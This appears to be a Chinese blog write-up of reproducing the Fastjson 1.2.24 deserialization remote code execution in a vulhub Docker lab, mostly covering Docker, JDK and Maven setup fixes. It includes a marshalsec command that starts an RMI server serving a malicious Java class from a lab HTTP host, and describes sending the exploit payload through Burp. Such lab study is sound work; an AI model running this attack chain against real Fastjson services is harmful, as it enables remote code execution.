Fastjson反序列化漏洞部署复现1.2.24版本反序列RCE笔记

环境部署

docker容器地址:https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

启动docker环境 docker容器每次一启动就报错 根据docker log [容器id] 查看报错日志发现有如下报错

library initialization failed - unable to allocate file descriptor table - out of memory

考虑是内存不够 如下方式修改 docker 报错 library initialization failed - unable to allocate file descriptor table - out of memory-CSDN博客

我们在win10虚拟机裸机中安装java8-jdk8+maven3.9.6+marshalsec工具用于启动rmi服务器

maven环境变量总是创建不成功 就去相应目录bin下cmd用mvn即可

mvn环境变量创建无效问题

解决办法:直接将绝对路径写到系统变量的path中 移动到最上面 记得系统调一下分辨率 环境变量那里有个确定要点 分辨率大了看不到 没点自然没保存

接下来进入工具marshalsec目录下执行mvn命令

mvn clean package -DskipTests

又出现报错 No compiler xxxx

mvn clean报错

先记得把jdk下的bin目录加入到环境变量 因为里面有javac

继续解决刚才红色的报错

最终解决参考:解决Maven错误No compiler is provided in this environment. Perhaps you are running on a JRE rather than a JDK? - 简书

总结:所有的java的jdk jre也好 全都直接在path中设置绝对路径

maven jre jdk都是设置到bin目录

但是mvn clean package -DskipTests执行需要一个环境变量JAVA_HOME,且对应的地址是jdk文件夹,不带bin

处理完这两步 也就解决了bug

在target文件夹

接下来我们创建恶意的java类

通过代码javac hacker.java

在kali中通过python启动http服务器 将恶意类放到192.168.206.162的4444端口上

最终通过刚才的工具 启动一个rmi服务器 加载刚才设置的恶意类

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.206.162:4444/#hacker" 9999

开始监听9999端口的内容 至此我们就开启了一个rmi服务器

kali中docker启动vulhub的fastjson1.2.24漏洞靶场环境 192.168.206.162 ip地址

通过bp抓包 修改内容 使用1.2.24的payload 我们的win10虚拟机是192.168.206.161

会先通过rmi请求到win10的rmi服务器

之后rmi服务器从kali的4444端口去取恶意类 返回给rmi服务器 rmi服务器再返回给8090的fastjson执行

至此整个完整的利用链也就复现完毕了

Yakit设置的恶意类没办法成功执行命令

设置ip地址为可以访问到的 通过http进行访问测试

恶意类反连成功 但是执行不成功 原因未知

参考地址

漏洞相关原理学习参考:Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_fastjson漏洞原理-CSDN博客

SQL注入关于DNSlog的内容参考:SQL注入之DNSLog外带注入-CSDN博客

不同java JDK版本下载地址

Java Archive | Oracle

java8的安装

JDK 8的下载、安装、配置【保姆级教程】_jdk8-CSDN博客

参考核心网址:

fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现_shiro远程命令执行-CSDN博客

相关推荐
Sheffield9 小时前
Docker的跨主机服务与其对应的优缺点
linux·网络协议·docker
Sheffield17 小时前
Alpine是什么,为什么是Docker首选?
linux·docker·容器
马艳泽18 小时前
win10下运行Start Broker and Proxy报错解决
docker
齐生11 天前
iOS 知识点 - 渲染机制、动画、卡顿小集合
笔记
用户13573999256602 天前
Windows 从 0 搭建 WSL2 原生 AI 开发环境:Codex + Docker + VSCode
docker
用户962377954482 天前
VulnHub DC-1 靶机渗透测试笔记
笔记·测试
vi_h2 天前
在 macOS 上通过 Docker 安装并运行 Ollama(详细可执行教程)
macos·docker·ollama
黑心老魔2 天前
通过 Docker 创建开发环境
docker·开发环境
冬奇Lab2 天前
一天一个开源项目(第41篇):Workout.cool - 现代化开源健身教练平台,训练计划与进度追踪
docker·开源·资讯
天朝八阿哥3 天前
使用Docker+vscode搭建离线的go开发调试环境
后端·docker·visual studio code